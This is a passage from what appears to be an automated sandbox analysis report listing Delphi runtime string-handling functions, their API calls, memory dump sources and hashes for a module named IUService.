                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50028338,?,?,00000001,?,?,50026115,00000000,50026237,?,?,?,?,00000000,00000000), ref: 5002830D
                                                                                                                                            • @Sysutils@StrCharLength$qqrpxb.RTL120(00000000,50028338,?,?,00000001,?,?,50026115,00000000,50026237,?,?,?,?,00000000,00000000), ref: 5002831B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: StringSystem@System@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$CharChar$qqrx20InternalLength$qqrpxbSysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3042977434-0
                                                                                                                                            • Opcode ID: 6379ca91532523d5bce16a0909a6e0df30a6d0f000e913d4fb421b896347fca2
                                                                                                                                            • Instruction ID: 47000205c57155a74c5d18828630aa859fd0bb08eddc99539042e8fa57d804a7
                                                                                                                                            • Opcode Fuzzy Hash: 6379ca91532523d5bce16a0909a6e0df30a6d0f000e913d4fb421b896347fca2
                                                                                                                                            • Instruction Fuzzy Hash: 6101DF34A131C6EFEB00DBA8E91289DB3FAEF94600BA182B2E50093614E7349F00D390
                                                                                                                                            Function 50028470 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrAddRef$qqrpv.RTL120(00000000,?,?,?,50027A9B,00000000,50027ABC), ref: 5002847E
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,500284EE,?,00000000,?,?,?,50027A9B,00000000,50027ABC), ref: 500284AE
                                                                                                                                              • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                                                            • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500284EE,?,00000000,?,?,?,50027A9B,00000000,50027ABC), ref: 500284C7
                                                                                                                                            • @Sysutils@StrCharLength$qqrpxc.RTL120(00000000,500284EE,?,00000000,?,?,?,50027A9B,00000000,50027ABC), ref: 500284CF
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(500284F5,00000000,?,?,?,50027A9B,00000000,50027ABC), ref: 500284E8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$AnsiStringSystem@%$FromStr$qqrr27StringusSystem@T$us$i0$%x20Unicode$CharChar$qqrx27Clr$qqrpvInternalLength$qqrpxcRef$qqrpvSysutils@T$us$i0$%
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2156883435-0
                                                                                                                                            • Opcode ID: a3c48d0067439e3e87823feac1d7b494006b287914f12001d4e96a8a66b71b4b
                                                                                                                                            • Instruction ID: 715662b57516d9754a6f786f41bd808451b406471416e7d906745c201c20a256
                                                                                                                                            • Opcode Fuzzy Hash: a3c48d0067439e3e87823feac1d7b494006b287914f12001d4e96a8a66b71b4b
                                                                                                                                            • Instruction Fuzzy Hash: C801DF30A0618AEF9B10EFB1ED6286DB3F9FB4420079146B6E800D3251E738EE0097A0
                                                                                                                                            Function 5001D8E0 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrAddRef$qqrpv.RTL120 ref: 5001D8EE
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5001D956), ref: 5001D91B
                                                                                                                                              • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                                                            • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001D956), ref: 5001D92E
                                                                                                                                            • @Sysutils@StrLCopy$qqrpcpxcui.RTL120(00000000,5001D956), ref: 5001D939
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(5001D95D), ref: 5001D950
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$AnsiStringSystem@%$FromStr$qqrr27StringusSystem@T$us$i0$%x20Unicode$Char$qqrx27Clr$qqrpvCopy$qqrpcpxcuiInternalRef$qqrpvSysutils@T$us$i0$%
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 225901233-0
                                                                                                                                            • Opcode ID: e797eab4a70677fbd8b65bf4ea9112dab01743d87ce20a58422a53b87a9f2b62
                                                                                                                                            • Instruction ID: 6789688a35950e27e6b693cafdea5081acba6db0b001ad7a1da5a9f1fa3c46a1
                                                                                                                                            • Opcode Fuzzy Hash: e797eab4a70677fbd8b65bf4ea9112dab01743d87ce20a58422a53b87a9f2b62
                                                                                                                                            • Instruction Fuzzy Hash: 3E01A230700A85AFAB01DFB8EDA186EB3F9EB492407A04277E504D3254EB70DE42C790
                                                                                                                                            Function 5002E0E4 Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002E0F3
                                                                                                                                            • GetCPInfo.KERNEL32(5002E1B0,?,00000000), ref: 5002E113
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(5002E1B0,?,00000000), ref: 5002E129
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(5002E1B0,?,00000000), ref: 5002E12E
                                                                                                                                            • @System@@AfterConstruction$qqrp14System@TObject.RTL120(5002E1B0,?,00000000), ref: 5002E146
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@System@@$AfterClassClassoConstruction$qqrp14Create$qqrp17Except$qqrvException@$bctr$qqrp20InfoMetaObjectRaiseStringSysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2125405577-0
                                                                                                                                            • Opcode ID: 75e8563de8be2d28d6ec57e3352ae8178458ce8a71039ebcc560a7693fac316e
                                                                                                                                            • Instruction ID: e188588ab113c5b644c7c0773fcb92f3a1bc056ea3630c60d22f3d69e5b640df
                                                                                                                                            • Opcode Fuzzy Hash: 75e8563de8be2d28d6ec57e3352ae8178458ce8a71039ebcc560a7693fac316e
                                                                                                                                            • Instruction Fuzzy Hash: 3001A772A027C58FD720DFACED81996B7E8AF14660B00872AFD59C7741E631E91487E1
                                                                                                                                            Function 50028348 Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrAddRef$qqrpv.RTL120 ref: 50028356
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,500283C6), ref: 50028388
                                                                                                                                              • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                                                            • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500283C6), ref: 500283A1
                                                                                                                                            • @Sysutils@StrCharLength$qqrpxc.RTL120(00000000,500283C6), ref: 500283A9
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(500283CD), ref: 500283C0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$AnsiStringSystem@%$FromStr$qqrr27StringusSystem@T$us$i0$%x20Unicode$CharChar$qqrx27Clr$qqrpvInternalLength$qqrpxcRef$qqrpvSysutils@T$us$i0$%
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2156883435-0
                                                                                                                                            • Opcode ID: 61786a68f427a2116d5208153580c4d6983de50613a64baaa57ab0f0d3e4fb59
                                                                                                                                            • Instruction ID: 1d01ce25d3aa61c431e68410e02d36fe869a463c4c523e8f2aa4dd5117b6b204
                                                                                                                                            • Opcode Fuzzy Hash: 61786a68f427a2116d5208153580c4d6983de50613a64baaa57ab0f0d3e4fb59
                                                                                                                                            • Instruction Fuzzy Hash: 82018F30A06185AFDB01DFB4E96296DB3E9EF44640B9106B7F440D3252E734AF009790
                                                                                                                                            Function 5001D964 Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001D9D8), ref: 5001D99D
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001D9D8), ref: 5001D9B0
                                                                                                                                            • @Sysutils@StrLCopy$qqrpbpxbui.RTL120(00000000,5001D9D8), ref: 5001D9BB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: StringSystem@System@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Char$qqrx20Copy$qqrpbpxbuiInternalSysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1472205855-0
                                                                                                                                            • Opcode ID: d2a7149999e3ca1ca5ee6a783244f8d1fcb7852485f042ca67bcb824e4d164b7
                                                                                                                                            • Instruction ID: c11af60418324f05763cb7e6f29752fa05ca89a2dc4a7eae182604277afe3d4f
                                                                                                                                            • Opcode Fuzzy Hash: d2a7149999e3ca1ca5ee6a783244f8d1fcb7852485f042ca67bcb824e4d164b7
                                                                                                                                            • Instruction Fuzzy Hash: 05016231710E85AFAF01DFA9DD9285DB3F9EF8820079046B7E504D3611EB709E42D651
                                                                                                                                            Function 500269DC Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500269ED
                                                                                                                                            • @Sysutils@LoadStr$qqri.RTL120(?,00000000,50026A4E,?,?,?,?,00000000,00000000), ref: 50026A0F
                                                                                                                                            • @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,50026A4E,?,?,?,?,00000000,00000000), ref: 50026A1D
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026A4E,?,?,?,?,00000000,00000000), ref: 50026A28
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$System@@Sysutils@$Asg$qqrr20ClassClassoCreate$qqrp17Format$qqrx20LoadMetaRecxiStr$qqriStringStringpx14Stringx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2765079483-0
                                                                                                                                            • Opcode ID: ce2d3a5686d0a63d1e0902a166e3335a6fa43bf775ea014feb5ef3839ae02889
                                                                                                                                            • Instruction ID: 29fd1fbf12b5fecb8cf52ab6bc17093bc504a80d2aac76fc4f53b572846cc74c
                                                                                                                                            • Opcode Fuzzy Hash: ce2d3a5686d0a63d1e0902a166e3335a6fa43bf775ea014feb5ef3839ae02889
                                                                                                                                            • Instruction Fuzzy Hash: EA01A275600289ABD700CE94EC91E9EB7A9EF89720F918362F904A7740DB30EE01CAD1
                                                                                                                                            Function 50026A78 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 50026A89
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(?,00000000,50026AEA,?,?,?,?,00000000,00000000), ref: 50026AAB
                                                                                                                                            • @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,50026AEA,?,?,?,?,00000000,00000000), ref: 50026AB9
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026AEA,?,?,?,?,00000000,00000000), ref: 50026AC4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$StringSystem@@$Asg$qqrr20ClassClassoCreate$qqrp17Format$qqrx20LoadMetaRecxiString$qqrp20Stringpx14Stringx20Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2968566035-0
                                                                                                                                            • Opcode ID: 817dbf46161607a9b669e8961ae92c471a57c141c410dc2a02020cdf9f22e400
                                                                                                                                            • Instruction ID: a4508fb9ca55fcdc9539e334686b33a01e34f88c829117d28a676305680eca9a
                                                                                                                                            • Opcode Fuzzy Hash: 817dbf46161607a9b669e8961ae92c471a57c141c410dc2a02020cdf9f22e400
                                                                                                                                            • Instruction Fuzzy Hash: 9001A235601689AFD700CF94EC51E9EB7A9EF89620F918272F904A7740DA31EE01CAE1
                                                                                                                                            Function 5002671C Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002672D
                                                                                                                                            • @Sysutils@LoadStr$qqri.RTL120(?,00000000,50026788,?,?,?,?,00000000,00000000), ref: 5002674F
                                                                                                                                            • @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,50026788,?,?,?,?,00000000,00000000), ref: 5002675D
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026788,?,?,?,?,00000000,00000000), ref: 50026768
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$System@@Sysutils@$Asg$qqrr20ClassClassoCreate$qqrp17Format$qqrx20LoadMetaRecxiStr$qqriStringStringpx14Stringx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2765079483-0
                                                                                                                                            • Opcode ID: 82797bbb40d43ac66670649aa24e2307c392cdea19954696096313799db10cbd
                                                                                                                                            • Instruction ID: beac2be98222c8cf5cd228bb1a13cdf081a6ca164530b3398e22c63253403a1c
                                                                                                                                            • Opcode Fuzzy Hash: 82797bbb40d43ac66670649aa24e2307c392cdea19954696096313799db10cbd
                                                                                                                                            • Instruction Fuzzy Hash: F0F0A4356052886BD700DA94EC92E9EB7ADEF99760F918362F90497340D635AE01C691
                                                                                                                                            Function 500267B0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500267C1
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267E3
                                                                                                                                            • @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267F1
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267FC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$StringSystem@@$Asg$qqrr20ClassClassoCreate$qqrp17Format$qqrx20LoadMetaRecxiString$qqrp20Stringpx14Stringx20Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2968566035-0
                                                                                                                                            • Opcode ID: eb8dbeff97980f41212820df1590c374e9b04be7e90399179c1a7d1c7f44e779
                                                                                                                                            • Instruction ID: 59d3e7adbb39bbbd23096f0306fd7bc4bc599d625c45f80d349e960b686eec1b
                                                                                                                                            • Opcode Fuzzy Hash: eb8dbeff97980f41212820df1590c374e9b04be7e90399179c1a7d1c7f44e779
                                                                                                                                            • Instruction Fuzzy Hash: 58F0A9356016886BE710DA94EC52E9EB7ADDF85710F914372F90497341DA35AE01C6D1
                                                                                                                                            Function 50010598 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500105AC
